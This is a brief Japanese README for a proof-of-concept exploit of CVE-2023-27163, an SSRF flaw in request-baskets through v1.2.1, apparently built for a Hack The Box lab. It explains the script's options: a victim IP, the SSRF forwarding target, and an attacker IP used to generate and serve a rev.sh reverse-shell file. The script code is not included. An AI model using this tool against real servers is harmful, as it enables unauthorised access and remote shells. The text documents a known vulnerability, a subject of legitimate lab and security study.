
PoC CVE-2023-27163, SSRF, request-baskets v1.2.1まで
使用例
my_script.sh -i 10.10.11.111 -f 'localhost:80' -t 10.10.14.27
-i 被害サーバーのIP
-f SSRFによって生成された接続を転送する先のIPまたはアドレス
-t このオプションには、rev.shファイルを生成し公開するための、自身のローカルIPまたは攻撃元IPを指定します。
-p 特定のポートを設定する場合に使用します。
このスクリプトはHTBの実践的なラボに基づいて開発されました。